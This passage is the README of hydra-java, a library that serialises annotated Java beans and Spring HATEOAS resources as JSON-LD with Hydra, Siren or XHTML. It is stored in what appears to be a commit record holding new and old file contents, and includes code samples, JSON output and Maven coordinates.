recognizable based on public conventions, so that the client can act upon\nthe responses it receives without knowing the details of a vendor-specific api.\n\nIn other words: If a client is told to make a reservation for a concert ticket, it should be able to recognize what \none-fancy-api requires to achieve that without processing a vendor-specific documentation. How can we do that, purely based on a media type and relation names? Do we need hundreds of iana registered media types for all kinds of purposes?\n\n== Solution (evolving)\n\nI see http:\/\/www.w3.org\/TR\/json-ld\/[json-ld] (media type application\/ld+json) as a possible way to solve this problem without forcing people to ask me\nabout my vendor-specific documentation, thus decoupling the clients from my server types.\n\nClients should be able to understand a response based on widely available, standardized, public information.\n\nThe json-ld mediatype allows to bring descriptions of things in the real world from public vocabularies into your json files. With json-ld there *is* a way to say that a json response describes a http:\/\/schema.org\/MusicEvent[MusicEvent] which http:\/\/schema.org\/offers[offers] a http:\/\/schema.org\/Ticket[Ticket] without any vendor-specific documentation, and it can also link to other resources.\n\nA popular vocabulary which describes things on the internet is http:\/\/schema.org. It is used by all major search engines for search engine optimization and sufficient for basic needs. It also integrates with other vocabularies, \ne.g. by using http:\/\/schema.org\/additionalType[additionalType] to point to http:\/\/purl.org\/goodrelations\/[GoodRelations] classes or by using external enumerated values as shown by http:\/\/schema.org\/DeliveryMethod[DeliveryMethod].\n\n(For those of you about to say that the Semantic Web never took off, please note that json-ld is http:\/\/manu.sporny.org\/2014\/json-ld-origins-2\/[not about the Semantic Web at all]).\n\nhttp:\/\/www.hydra-cg.com\/[Hydra] adds interaction to the mix. It describes exactly how to post a ticket reservation.\n\nSo I want to add json-ld information to json objects serialized from my Java beans.\n\nJava beans have no knowledge about the meaning of their bean properties and they do not know what they represent in the real world.\n\nIn the simplest possible case I want to design my json objects so that they can be understood by others based on schema.org.\nBy simply calling my json transfer class `Person` and letting it have an attribute `name`, I want to get a publicly understandable\njson object, like this:\n\n[source, Java]\n----\n @Test\n public void testDefaultVocabIsRendered() throws Exception {\n\n class Person {\n private String name = \"Dietrich Schulten\";\n\n public String getName() {\n return name;\n }\n }\n\n mapper.writeValue(w, new Person());\n }\n----\n\nThe corresponding json-ld object, written by hydra-java:\n\n[source, Javascript]\n----\n{\n \"@context\": {\n \"@vocab\": \"http:\/\/schema.org\/\"\n },\n \"@type\": \"Person\",\n \"name\": \"Dietrich Schulten\"\n}\n----\n\nNote that I do not bind my clients to a server type `Person`. \nRather, client and server are talking about the thing http:\/\/schema.org\/Person[Person] as it is known and recognized by all major search engines.\n\nFor a more expressive example consider the json-ld example of http:\/\/schema.org\/MusicEvent[MusicEvent], which shows how a ticket offering could look like.\n\t\nIn a more complex scenario I want to use my own attribute names and object design and still be able to use schema.org or other vocabs to describe their meaning. In json-ld I can. See below for a listing of vocabularies.\n\n== First Steps\nIt is currently possible to render responses from a https:\/\/github.com\/spring-projects\/spring-hateoas[spring-hateoas] service based on Spring MVC with various message converters.\n\nLook into the https:\/\/github.com\/dschulten\/hydra-java\/blob\/master\/hydra-sample\/service\/src\/main\/java\/de\/escalon\/hypermedia\/sample\/Config.java[sample configuration] to see how you can set up the hydra message converter, but also the XHTML message converter and the Siren message converter with Spring MVC.\nThe tests in https:\/\/github.com\/dschulten\/hydra-java\/blob\/master\/hydra-jsonld\/src\/test\/java\/de\/escalon\/hypermedia\/hydra\/serialize\/JacksonHydraSerializerTest.java[JacksonHydraSerializerTest] demonstrate the usage of `@Vocab`, `@Expose` and `@Term`.\n\n== Features of hydra-spring\nThe conversion of a spring-hateoas Resource to hydra does the following:\n\n- renders a spring-hateoas `List<Link>` in a `Resource<T>` in json-ld style\n- renders spring-hateoas `Resources<T>` as `hydra:Collection`. If you use this feature, make sure you have a `@Term(define = \"hydra\", as = \"http:\/\/www.w3.org\/ns\/hydra\/core#\")` annotation in your context.\n- renders spring-hateoas `PagedResources<T>` as `hydra:Collection` with a `hydra:PartialCollectionView`. If you use this feature, make sure you have a `@Term(define = \"hydra\", as = \"http:\/\/www.w3.org\/ns\/hydra\/core#\")` annotation in your context.\n- renders response with `\"@vocab\" : \"http:\/\/schema.org\/\"` by default, a different `@vocab` can be defined on a class or package using the `@Vocab` annotation.\n- supports vocabularies in addition to the default vocabulary via terms in the `@context`. Use `@Term` in conjunction with `@Terms` on a class or package for this.\n- renders `@type` based on the Java class name by default, a vocabulary class can be produced instead using `@Expose` on the Java class.\n- renders attributes assuming that the attribute name is a property in the default vocab defined by `@vocab`. In other words, it renders an `offers` member as `\"offers\"` on a json-ld object with a context defining `\"@vocab\" : \"http:\/\/schema.org\"`, so that you end up with `\"http:\/\/schema.org\/offers\"` as linked data name for your `offers` member. To map a custom attribute name such as `foo` to an existing property in the default vocab or other vocabs use `@Expose` on the attribute and a term will be created in `@context` which maps your attribute to the vocab property you set as value of `@Expose`.\n- renders Java enums assuming that an enum value name is an enumerated value defined by the default vocab. In json-ld it is not only possible to have attribute names, but also attribute *values* that have linked data names. The idiom to express that is `\"@type\" : \"@vocab\"`. An example of this is http:\/\/schema.org\/OnSitePickup[OnSitePickup], which is an enum value for the property http:\/\/schema.org\/availableDeliveryMethod[availableDeliveryMethod]. If your Java enum value is ON_SITE_PICKUP, it matches the vocab value of OnSitePickup. It will be rendered as ON_SITE_PICKUP and hydra-java will add the necessary definition to the context which makes it clear that ON_SITE_PICKUP is actually `http:\/\/schema.org\/OnSitePickup`. If your Java enum value has a different name than the vocab value, use `@Expose` on the enum value to get a correct representation in the context. Note that you can also expose an enum value from a different vocabulary such as GoodRelations, see below.\n\nAs of version 0.2.0 hydra-java supports hydra:collection, hydra:operation and hydra:IriTemplate as well as reversed terms. To make this possible, you *must* use the `linkTo` and `methodOn` methods of AffordanceBuilder as a drop-in replacement for `ControllerLinkBuilder`. Templated links created by ControllerLinkBuilder will at least be rendered as IriTemplates, but only with limited information about the template variables.\n\nFurthermore, if you use these hydra features, make sure you have a `@Term(define = \"hydra\", as = \"http:\/\/www.w3.org\/ns\/hydra\/core#\")` annotation in your context.\n\n* renders a link to a remote collection as https:\/\/www.w3.org\/community\/hydra\/wiki\/Collection_Design[hydra:collection]. If you define the affordance to the remote collection with `AffordanceBuilder.rel()`, the remote collection gets a `hydra:subject` in its manages block, whereas if you define it with `reverseRel()` you get a `hydra:object`. To learn more about this design, consider the article https:\/\/www.w3.org\/community\/hydra\/wiki\/Collection_Design[Collection Design] in the hydra-cg wiki.\n* renders a templated link as `hydra:IriTemplate`. Method parameters can be annotated with `@Expose` to assign them a property URI, otherwise the variable name will be shown as a term in the current vocab. If you create a link with AffordanceBuilder's linkTo-method facilities and you pass `null` for arguments annotated with `@PathVariable` or `@RequestParam`, it will automatically become a templated link with variables for the `null` arguments.\n* renders a link to method handlers for any *combination* of GET, POST, PUT, PATCH and DELETE as `hydra:operation`. In order to express that multiple HTTP methods can be invoked on the same resource, use the `and()` method of AffordanceBuilder. See below for an example.\n* renders a single, manually created, non-templated Link or Affordance in json-ld style.\n* renders a POJO method parameter annotated with `@RequestBody` as expected rdfs:subClassOf. Use `@Expose` on the POJO class for a custom identifier. The setter methods on the bean appear as `hydra:supportedProperty`, and you can annotate them with `@Expose` to give them a semantic identifier. Again see below for an example.\n* uses certain schema.org facilities to describe expected request bodies. For this we need schema.org either as `@vocab` or as a `schema:` term. If you do not use schema.org as `@vocab`, make sure you have a `@Term(define = \"schema\", as = \"http:\/\/schema.org\/\")` in the context.\n** expresses default value and value constraints by means of http:\/\/schema.org\/PropertyValueSpecification. To specify such constraints, use the `@Input` annotation. Available constraints are min, max, step, minLength, maxLength and pattern.\n** expresses supported properties whose value is an object by nesting them via http:\/\/schema.org\/rangeIncludes.\n\n\n== Examples\n\n=== Designing a Hydra API ===\nSee my article https:\/\/www.w3.org\/community\/hydra\/wiki\/Restbucks_with_Hydra for an example of an ordering flow. There is also a http:\/\/jbosswildfly-escalon.rhcloud.com\/hypermedia-api\/store[Sample Shop] which demonstrates the ideas from the article.\n\n=== Live Demo\n\nUse a ReST client to access a http:\/\/jbosswildfly-escalon.rhcloud.com\/hypermedia-api\/events[Sample Events API] to see the artifact hydra-sample at work. OpenShift sometimes completely shuts down the container, please try several times if you run into server errors when first accessing the sample.\n\nBrowsers will show the html representation of the API by default, which uses the `XhtmlResourceMessageConverter`. Sending `Accept: application\/ld+json` will get you hydra, but `application\/json` or `application\/hal+json` work as well. \nWhen you POST or PUT, make sure you add a Content-Type header matching your request.\n\n\n=== Exposing Java Bean Attributes\n\nAssuming a Java enum whose enum values are exposed as values from GoodRelations and which appears on an Offer object with GoodRelations term:\n\nThe example shows a Java enum named `BusinessFunction\u02cb whose enum values are exposed as values from GoodRelations. The enum appears on an Offer object with a GoodRelations term:\n\n[source, Java]\n----\n enum BusinessFunction {\n @Expose(\"gr:LeaseOut\")\n RENT,\n @Expose(\"gr:Sell\")\n FOR_SALE,\n @Expose(\"gr:Buy\")\n BUY\n }\n\n @Term(define = \"gr\", as = \"http:\/\/purl.org\/goodrelations\/v1#\")\n class Offer {\n public BusinessFunction businessFunction;\n ...\n }\n----\n\nThe json-ld output written by hydra-java makes the GoodRelations url known under the shorthand `gr`, says that the `businessFunction` property contains values defined by a vocabulary and maps the Java enum value `RENT` to its linked data name `\"gr:LeaseOut\"`.\n\n[source, Javascript]\n----\n{\n \"@context\": {\n \"@vocab\": \"http:\/\/schema.org\/\",\n \"gr\": \"http:\/\/purl.org\/goodrelations\/v1#\",\n \"businessFunction\": {\"@type\": \"@vocab\"},\n \"RENT\": \"gr:LeaseOut\"\n },\n \"@type\": \"Offer\",\n \"businessFunction\": \"RENT\"\n}\n----\n\n=== AffordanceBuilder for rich hyperlinks\n\nA hypermedia affordance is a rich hyperlink. That means, it not only contains a URI or a URITemplate, but also information about the usage of the URI, such as supported http methods and expected parameters. The term 'hypermedia affordance' is a neologism made popular by http:\/\/amundsen.com\/blog\/archives\/1109[Mike Amundsen], following an earlier reference in http:\/\/roy.gbiv.com\/talks\/200804_REST_ApacheCon.pdf[A little REST and Relaxation] by Roy Fielding.\nA hydra-java `Affordance` can be used to render media-types which support this kind of information: first and foremost hydra, but it is quite easy to add message converters for other media types once the basic information is available.\n\nVersion 0.2.0 provides an `AffordanceBuilder` class which is a drop-in replacement for the spring-hateoas `ControllerLinkBuilder`.\n\nThe `AffordanceBuilder` does _not depend on hydra or json-ld_. It lives in the standalone jar spring-hateoas-ext and can also be used to render other media types than json-ld. It has support for all HAL link attributes when rendered as HAL, and can also be\nrendered as Siren or XHtml using message converters from spring-hateoas-ext.\n\nSee <<Maven Support>> for the maven coordinates of spring-hateoas-ext.\n\nUse the `AffordanceBuilder` to build `Affordance` instances which inherit from the spring-hateoas `Link` but add the following traits to it:\n\n* Full support for all attributes of a http Link header as described by the https:\/\/tools.ietf.org\/html\/rfc5988[web linking rfc 5988]\n* Support for templated link headers as described by the http:\/\/tools.ietf.org\/html\/draft-nottingham-link-template-01[Link-Template Header Internet draft]\n* Improved creation of link templates. You can use the `linkTo-methodOn` technique to create templated links to handler methods. By simply leaving a parameter undefined (`null`) in a `methodOn` sample call, a template variable will be applied to your link.\n* Facility to chain several method invocations on the same resource. If the same link is used to PUT and DELETE a resource, use `AffordanceBuilder.and()` to add both method handlers to the affordance.\n* Has action descriptors with information about http methods and expected request data. Based on reflection and a minimal set of annotations it is possible to render forms-like affordances with quite precise information about expected input.\n\nIn the following we use `AffordanceBuilder` to add a `self` rel that can be used with GET, PUT and DELETE to an event bean.\nFirst we wrap the event into a `Resource` so we can add affordances to it. Then we use the `linkTo-methodOn` technique three times to describe that the self rel can be used to get, update and delete the event.\n\n[source, Java]\n----\n\n import static de.escalon.hypermedia.spring.AffordanceBuilder.linkTo;\n import static de.escalon.hypermedia.spring.AffordanceBuilder.methodOn;\n\n @Controller\n @RequestMapping(\"\/events\")\n public class EventController {\n\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.GET)\n public @ResponseBody Resource<Event> getEvent(@PathVariable Integer eventId) {\n \/\/ get the event from some backend, then:\n Resource<Event> eventResource = new Resource<Event>(event);\n\n \/\/ using AffordanceBuilder.linkTo and AffordanceBuilder.methodOn\n \/\/ instead of ControllerLinkBuilder methods\n eventResource.add(linkTo(methodOn(EventController.class)\n .getEvent(event.id))\n .and(linkTo(methodOn(EventController.class) \/\/ 2nd action with .and\n .updateEvent(event.id, event)))\n .and(linkTo(methodOn(EventController.class) \/\/ 3rd action with .and\n .deleteEvent(event.id)))\n .withSelfRel());\n return eventResource;\n }\n\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.GET)\n public @ResponseBody Resource<Event> getEvent(@PathVariable Integer eventId) {\n ...\n }\n\n\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.PUT)\n public ResponseEntity<Void> updateEvent(@PathVariable int eventId, @RequestBody Event event) {\n ...\n }\n\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.DELETE)\n public ResponseEntity<Void> deleteEvent(@PathVariable int eventId) {\n ...\n }\n }\n\n public class Event {\n public final int id;\n public final String performer;\n public final String location;\n private EventStatusType eventStatus;\n private String name;\n\n public Event(int id, String performer, String name, String location, EventStatusType eventStatus) {\n ...\n }\n\n public void setEventStatus(EventStatusType eventStatus) {\n this.eventStatus = eventStatus;\n }\n }\n\n----\n\nWhen rendered with the `HydraMessageConverter`, the resulting json-ld event object has the corresponding GET, PUT and DELETE operations. The PUT operation expects an http:\/\/schema.org\/Event[Event] with a property http:\/\/schema.org\/eventStatus[eventStatus]. By default, writable properties (with a setter following the JavaBean conventions) are rendered as `hydra:supportedProperty`. The URI to be used by the operations is the `@id` of the object that has a `hydra:operation`.\n\n[source, Javascript]\n----\n {\n \"@type\": \"Event\",\n \"@id\": \"http:\/\/localhost\/events\/1\",\n \"performer\": \"Walk off the Earth\",\n \"location\": \"Wiesbaden\",\n \"name\": \"Gang of Rhythm Tour\",\n \"eventStatus\" : \"EVENT_SCHEDULED\",\n \"hydra:operation\": [\n {\n \"hydra:method\": \"GET\"\n },\n {\n \"hydra:method\": \"PUT\",\n \"hydra:expects\":\n {\n \"@type\": \"Event\",\n \"hydra:supportedProperty\": [\n {\n \"hydra:property\": \"eventStatus\",\n \"hydra:required\": \"true\",\n \"readonlyValue\": false\n },\n {\n \"hydra:property\": \"location\",\n \"defaultValue\": \"Wiesbaden\",\n \"readonlyValue\": false\n },\n ... other properties required for a replacing PUT\n ]\n }\n },\n {\n \"hydra:method\": \"DELETE\"\n }\n ]\n }\n----\n\n\n=== Specifying Property Value Requirements (from V. 0.2.0)\n\nNow let us tell the client a range of possible values for a property. We want to allow clients to add reviews for the work performed at an event. For this, we add a `Resource<CreativeWork>` to the `Event`, so that we can define an affordance on the creative work which allows clients to send reviews.\n\n[source, Java]\n----\n public class Event {\n ...\n private final Resource<CreativeWork> workPerformed;\n\n public Resource<CreativeWork> getWorkPerformed() {\n return workPerformed;\n }\n ...\n }\n\n \/\/ in EventController:\n @RequestMapping(value = \"\/{eventId}\", method = RequestMethod.GET)\n public @ResponseBody Resource<Event> getEvent(@PathVariable Integer eventId) {\n\n \/\/ with an event from backend do this:\n\n event.getWorkPerformed() \/\/ <-- must be a Resource<CreativeWork>\n .add(linkTo(methodOn(ReviewController.class) \/\/ <-- must use AffordanceBuilder.linkTo here\n .addReview(event.id, new Review(null, new Rating(3)))) \/\/ <-- default ratingValue 3\n .withRel(\"review\"));\n ...\n }\n\n @Controller\n @RequestMapping(\"\/reviews\")\n public class ReviewController {\n\n @RequestMapping(value = \"\/events\/{eventId}\", method = RequestMethod.POST)\n public ResponseEntity<Void> addReview(@PathVariable int eventId, @RequestBody Review review) {\n \/\/ add review and return 201 Created\n }\n }\n----\n\nWe expect that clients post a Review with a review body and a rating. The review body and the rating value have input constraints, so we annotate the method `setReviewBody` with `@Input(pattern=\".{10,}\")` and `setRatingValue` with `@Input(min = 1, max = 5, step = 1)`, as shown below.\n\n[source, Java]\n----\n\n public class Rating {\n private String ratingValue;\n\n @JsonCreator\n public Rating(@JsonProperty(\"ratingValue\") Integer ratingValue) {\n ..\n }\n\n\n public void setRatingValue(@Input(min = 1, max = 5, step = 1) String ratingValue) {\n this.ratingValue = ratingValue;\n }\n }\n\n\n public class Review {\n\n private String reviewBody;\n private Rating reviewRating;\n\n @JsonCreator\n public Review(@JsonProperty(\"reviewBody\") String reviewBody,\n @JsonProperty(\"reviewRating\") Rating reviewRating) {\n ...\n }\n\n public void setReviewBody(@Input(pattern=\".{10,}\") String reviewBody) {\n ...\n }\n\n public void setReviewRating(Rating rating) {\n this.reviewRating = rating;\n }\n }\n\n----\n\nIn the resulting json-ld we use schema.org's http:\/\/schema.org\/PropertyValueSpecification[PropertyValueSpecification] to express the input constraints `minValue`, `maxValue`, `stepValue` and `valuePattern`, as well as `defaultValue` containing the rating value `3` that was passed to the sample method invocation with `methodOn`. Note that the creative work has a `review` attribute now, although the `CreativeWork` pojo has no such property. It appears because we added a rel `review` to the workPerformed resource.\n\nRight now it is not possible to specify a list of expected values, neither with hydra nor with `schema:PropertyValueSpecification`. If you are interested in that, look into https:\/\/github.com\/HydraCG\/Specifications\/issues\/82[#82 Add support for allowed literals and allowed individuals] and participate in the discussion in the http:\/\/lists.w3.org\/Archives\/Public\/public-hydra\/2015Jan\/0019.html[Hydra-CG mailing list].\n\n[source, Javascript]\n----\n{\n \"@context\":\n {\n \"@vocab\": \"http:\/\/schema.org\/\",\n \"hydra\": \"http:\/\/www.w3.org\/ns\/hydra\/core#\",\n \"eventStatus\":\n {\n \"@type\": \"@vocab\"\n },\n \"EVENT_SCHEDULED\": \"EventScheduled\"\n },\n \"@type\": \"Event\",\n \"performer\": \"Walk off the Earth\",\n \"location\": \"Wiesbaden\",\n \"eventStatus\": \"EVENT_SCHEDULED\",\n \"workPerformed\": {\n \"@type\": \"CreativeWork\",\n \"name\": \"Gang of Rhythm Tour\",\n \"review\": {\n \"@id\": \"http:\/\/localhost:8210\/webapp\/hypermedia-api\/reviews\/events\/1\",\n \"hydra:operation\": [\n {\n \"@type\": \"ReviewAction\",\n \"hydra:method\": \"POST\",\n \"hydra:expects\": {\n \"@type\": \"Review\",\n \"hydra:supportedProperty\": [\n {\n \"@type\": \"PropertyValueSpecification\",\n \"hydra:property\": \"reviewBody\",\n \"valuePattern\": \".{10,}\"\n },\n {\n \"hydra:property\": \"reviewRating\",\n \"rangeIncludes\": {\n \"@type\": \"Rating\",\n \"hydra:supportedProperty\": [\n {\n \"@type\": \"PropertyValueSpecification\",\n \"hydra:property\": \"ratingValue\",\n \"defaultValue\": 3,\n \"maxValue\": 5,\n \"minValue\": 1,\n \"stepValue\": 1\n }\n ]\n }\n }\n ]\n }\n }\n ]\n }\n }\n}\n\n----\n\nIf an expected property on a request object holds a nested json object in turn, hydra-java will render it following a proposal from https:\/\/github.com\/HydraCG\/Specifications\/issues\/26[Hydra-CG Issue 26] using http:\/\/schema.org\/rangeIncludes[schema:rangeIncludes]. The fact that this issue is not resolved yet is the main reason why hydra-java 0.2.0 is an alpha release. So be especially wary that changes are likely for the way hydra-java prescribes nested properties.\n\n\n=== Rendering other media types (from V. 0.2.0-alpha8)\n\nClients should be able to request a media-type they understand by means of content negotiation. Following this principle, the spring-hateoas-ext package provides the foundation to render hypermedia types which describe expected requests - not only as json-ld, but also as other media types. \n\n==== XhtmlResourceMessageConverter\n\n\nThe `XhtmlResourceMessageConverter` is the second message converter in hydra-java which makes use of affordances built by `AffordanceBuilder`.\n\nIf you add a `JsonLdDocumentationProvider` on the converter, it will render bean attributes as hyperlinks which point to their documentation on schema.org or other vocabularies, provided that your java beans are annotated with the necessary information.\n\nThe xhtml response renders bootstrap conforming markup, you can add bootstrap css as shown below, or your own stylesheets.\n\n[source, Java]\n----\n\n@Configuration\n@EnableWebMvc\npublic class Config extends WebMvcConfigurerAdapter {\n ...\n @Override\n public void configureMessageConverters(List<HttpMessageConverter<?>> converters) {\n converters.add(halConverter());\n converters.add(xhtmlMessageConverter());\n converters.add(jsonConverter());\n }\n\n private HttpMessageConverter<?> xhtmlMessageConverter() {\n XhtmlResourceMessageConverter xhtmlResourceMessageConverter = new XhtmlResourceMessageConverter();\n xhtmlResourceMessageConverter.setStylesheets(\n Arrays.asList(\n \"https:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.4\/css\/bootstrap.min.css\"\n ));\n xhtmlResourceMessageConverter.setDocumentationProvider(new JsonLdDocumentationProvider());\n return xhtmlResourceMessageConverter;\n }\n ...\n}\n\n----\n\nTo make the API browsable, PUT and DELETE are tunneled through POST. This is necessary because the HTML media type does not support PUT or DELETE, the browser cannot handle a form which has other methods than GET or POST. Spring-MVC has a servlet filter which makes tunneling easy. The web.xml of the hydra-sample service shows how to enable that filter:\n\n[source, XML]\n----\n <filter>\n <filter-name>HiddenHttpMethodFilter<\/filter-name>\n <filter-class>org.springframework.web.filter.HiddenHttpMethodFilter<\/filter-class>\n <\/filter>\n <filter-mapping>\n <filter-name>HiddenHttpMethodFilter<\/filter-name>\n <servlet-name>hypermedia-api<\/servlet-name>\n <\/filter-mapping>\n----\n\n\n==== SirenMessageConverter (from V. 0.2.0-beta5)\nThe `SirenMessageConverter` renders Spring Hateoas Responses as https:\/\/github.com\/kevinswiber\/siren[Siren] messages, using the media type `application\/vnd.siren+json`.\n\n* maps a plain Spring Hateoas `Link` to an embedded link or navigational link.\n* a templated link becomes a Siren GET action with named siren fields for the template query variables\n* in order to produce more expressive Siren actions, use the `linkTo-methodOn` idiom of `AffordanceBuilder` to point to your methods, as shown above for the sample `EventController` in the section AffordanceBuilder.\n* possible values found by `AffordanceBuilder` are treated as checkbox or radio button fields, following the technique discussed in the https:\/\/groups.google.com\/forum\/#!topic\/siren-hypermedia\/8mbOX44gguU[Siren group].\n* field types can be defined via the value of the `@Input` annotation on method parameters (e.g. `@Input(Type.DATE)`).\n* nested `Resource` objects are shown as embedded representations\n* distinguishes navigational and embedded links by a default list of navigational rels. This list can be customized via `SirenMessageConverter.addNavigationalRels`.\n* for sub-entities the property name is used as relation name. The Siren class name is derived from the Java class name. The rel names can be customized using a `DocumentationProvider` implementation, e.g. the `JsonLdDocumentationProvider` from hydra-jsonld will make use of `@Expose` and `@Vocab` annotations on your response bean packages.\n* relies on `XhtmlMessageConverter` to process incoming form-urlencoded requests and on `MappingJackson2HttpMessageConverter` for json requests.\n\nThe Siren output for the sample `EventController` above is shown below. Note that the JsonLdDocumentationProvider has created the link relation type `http:\/\/schema.org\/workPerformed`. One could also use the UrlPrefixDocumentationProvider for simple URL prefixing.\n[source, Javascript]\n----\n{\n \"class\": [\n \"event\"\n ],\n \"properties\": {\n \"performer\": \"Walk off the Earth\",\n \"eventStatus\": \"EVENT_SCHEDULED\",\n \"location\": \"Wiesbaden\"\n },\n \"entities\": [\n {\n \"class\": [\n \"creativeWork\"\n ],\n \"rel\": [\n \"http:\/\/schema.org\/workPerformed\"\n ],\n \"properties\": {\n \"name\": \"Gang of Rhythm Tour\"\n },\n \"actions\": [\n {\n \"name\": \"addReview\",\n \"method\": \"POST\",\n \"href\": \"http:\/\/example.com\/webapp\/hypermedia-api\/reviews\/events\/1\",\n \"fields\": [\n {\n \"name\": \"reviewBody\",\n \"type\": \"text\"\n },\n {\n \"name\": \"reviewRating.ratingValue\",\n \"type\": \"number\",\n \"value\": \"3\"\n }\n ]\n }\n ]\n }\n ],\n \"actions\": [\n {\n \"name\": \"updateEvent\",\n \"method\": \"PUT\",\n \"href\": \"http:\/\/example.com\/webapp\/hypermedia-api\/events\/1\",\n \"fields\": [\n {\n \"name\": \"location\",\n \"type\": \"text\",\n \"value\": \"Wiesbaden\"\n },\n {\n \"name\": \"eventStatus\",\n \"type\": \"radio\",\n \"value\": [\n {\n \"value\": \"EVENT_CANCELLED\"\n },\n {\n \"value\": \"EVENT_POSTPONED\"\n },\n {\n \"value\": \"EVENT_SCHEDULED\",\n \"selected\": true\n },\n {\n \"value\": \"EVENT_RESCHEDULED\"\n }\n ]\n }\n ... other properties required for a replacing PUT\n ]\n },\n {\n \"name\": \"deleteEvent\",\n \"method\": \"DELETE\",\n \"href\": \"http:\/\/example.com\/webapp\/hypermedia-api\/events\/1\"\n }\n ],\n \"links\": [\n {\n \"rel\": [\n \"self\"\n ],\n \"href\": \"http:\/\/example.com\/webapp\/hypermedia-api\/events\/1\"\n }\n ]\n}\n----\n\n\n\n== Maven Support\nThe latest Maven releases of hydra-java are in Maven central. These are the maven coordinates for hydra-spring.\n\n[source, XML]\n----\n<dependency>\n <groupId>de.escalon.hypermedia<\/groupId>\n <artifactId>hydra-spring<\/artifactId>\n <version>0.3.0<\/version>\n<\/dependency>\n----\n\nIf you only want to use `AffordanceBuilder` or the `XhtmlResourceMessageConverter` and `SirenMessageConverter` without the json-ld dependencies, use spring-hateoas-ext alone:\n\n[source, XML]\n----\n<dependency>\n <groupId>de.escalon.hypermedia<\/groupId>\n <artifactId>spring-hateoas-ext<\/artifactId>\n <version>0.3.0<\/version>\n<\/dependency>\n----\n\n== Vocabularies\nWhat if schema.org is not sufficient? On\nhttp:\/\/lov.okfn.org\/dataset\/lov\/[Linked Open Vocabularies] you can search for terms in other vocabularies. Another option is to http:\/\/www.w3.org\/wiki\/WebSchemas\/SchemaDotOrgProposals[propose an addition to schema.org].\n\nIf you are unsure which vocab to use, ask on the http:\/\/lists.w3.org\/Archives\/Public\/public-hydra\/[ hydra mailing list].\n\n== What's new\n=== 0.3.0\n\n- extraction of ActionDescriptor and ActionInputParameter interfaces, coordinating with http:\/\/www.hdiv.org\/[HDIV] to get forms into spring-hateoas\n- optimization of json-ld output: do not repeat terms which are in the parent context already\n- simple feature to use query parameters mapped to parameter bean or parameter Map annotated with @Input rather than single RequestParam arguments. Right now, it can only be used to build a UriTemplate, no description for the template variables is available yet. Use `@Input(include=..., exclude=...)` to filter applicable bean properties or describe expected Map values. The UriTemplate for such an affordance is available via `Affordance.getUriTemplateComponents().toString()`, but not via `Affordance.toString()` to keep an Affordance created via AffordanceBuilder compatible with a Link created by ControllerLinkBuilder.\n- Affordance now has a `type` property and unwraps extension link params when rendered as JSON, which e.g. allows to use link attributes of HAL (type, name, deprecation etc.) which are not present in the basic `Link` class\n\n\n\t\n== Acknowledgements\n\nI would like to thank Mike Amundsen, Stu Charlton, Jon Moore, J\u00f8rn Wildt, Mike Kelly, Markus Lanthaler, Gregg Kellog and Manu Sporny for their inspiration and for valuable comments along the way. Also thanks to Oliver Gierke who has been accepting some of my pull requests to spring-hateoas.\n","old_contents":"= hydra-java image:https:\/\/travis-ci.org\/dschulten\/hydra-java.svg?branch=master[\"Build Status\", link=\"https:\/\/travis-ci.org\/dschulten\/hydra-java\"]\n:toc:\n:toc-placement: preamble\n\nAnnotate your Java beans and serialize them as http:\/\/www.w3.org\/TR\/json-ld\/[json-ld] with http:\/\/www.hydra-cg.com\/spec\/latest\/core\/[hydra].\n\nStatus: Testing. Since the Hydra Specification is still a draft, expect incompatible changes.\n\nLatest release: 0.3.0-beta6\n\n== Problem\n\nThe meaning of json attributes in api responses, their possible values etc. is usually not obvious without referring to some \ninformation coming from outside the resource itself. That is due to the nature of json. Two solutions immediately come to mind. Both are ways of vendor-specific documentation, some are machine-readable, some aren't. \n\nDescribe the type in some sort of json-schema, wadl, raml, swagger or similar and publish it together with the resource. People could even generate classes from this information, if they wish to. My api users coming from a wsdl background scream for something like that. \n\nOr put up documentation pages to describe your ex:doodad extension relation types and make the documentation available by dereferencing http:\/\/example.com\/api\/rels#doodad.\n\nBut one of the rules for a ReSTful API is:\n\n[quote, Roy Fielding]\n____\nA REST API should never have \u201ctyped\u201d resources that are significant to the client. \nSpecification authors may use resource types for describing server implementation behind the interface, \nbut those types must be irrelevant and invisible to the client. \nThe only types that are significant to a client are the current representation\u2019s media type and standardized relation names. \n[Failure here implies that clients are assuming a resource structure due to out-of band information, \nsuch as a domain-specific standard, which is the data-oriented equivalent to RPC's functional coupling].\n____\n\nMy interpretation of this famous http:\/\/roy.gbiv.com\/untangled\/2008\/rest-apis-must-be-hypertext-driven[rant by Roy Fielding]:\n\nA publicly available media-type should give clients all necessary means to interpret a server response, \nand relation names for hyperlinks in the response must be recognizable based on public conventions, so that the client can act upon\nthe responses it receives without knowing the details of a vendor-specific api.\n\nIn other words: If a client is told to make a reservation for a concert ticket, it should be able to recognize what \none-fancy-api requires to achieve that without processing a vendor-specific documentation. How can we do that, purely based on a media type and relation names? Do we need hundreds of iana registered media types for all kinds of purposes?\n\n== Solution (evolving)\n\nI see http:\/\/www.w3.org\/TR\/json-ld\/[json-ld] (media type application\/ld+json) as a possible way to solve this problem without forcing people to ask me\nabout my vendor-specific documentation, thus decoupling the clients from my server types.\n\nClients should be able to understand a response based on widely available, standardized, public information.\n\nThe json-ld mediatype allows to bring descriptions of things in the real world from public vocabularies into your json files. With json-ld there *is* a way to say that a json response describes a http:\/\/schema.org\/MusicEvent[MusicEvent] which http:\/\/schema.org\/offers[offers] a http:\/\/schema.org\/Ticket[Ticket] without any vendor-specific documentation, and it can also link to other resources.\n\nA popular vocabulary which describes things on the internet is http:\/\/schema.org. It is used by all major search engines for search engine optimization and sufficient for basic needs. It also integrates with other vocabularies, \ne.g. by using http:\/\/schema.org\/additionalType[additionalType] to point to http:\/\/purl.org\/goodrelations\/[GoodRelations] classes or by using external enumerated values as shown by http:\/\/schema.org\/DeliveryMethod[DeliveryMethod].\n\n(For those of you about to say that the Semantic Web never took off, please note that json-ld is http:\/\/manu.sporny.org\/2014\/json-ld-origins-2\/[not about the Semantic Web at all]).\n\nhttp:\/\/www.hydra-cg.com\/[Hydra] adds interaction to the mix. It describes exactly how to post a ticket reservation.\n\nSo I want to add json-ld information to json objects serialized from my Java beans.\n\nJava beans have no knowledge about the meaning of their bean properties and they do not know what they represent in the real world.\n\nIn the simplest possible case I want to design my json objects so that they can be understood by others based on 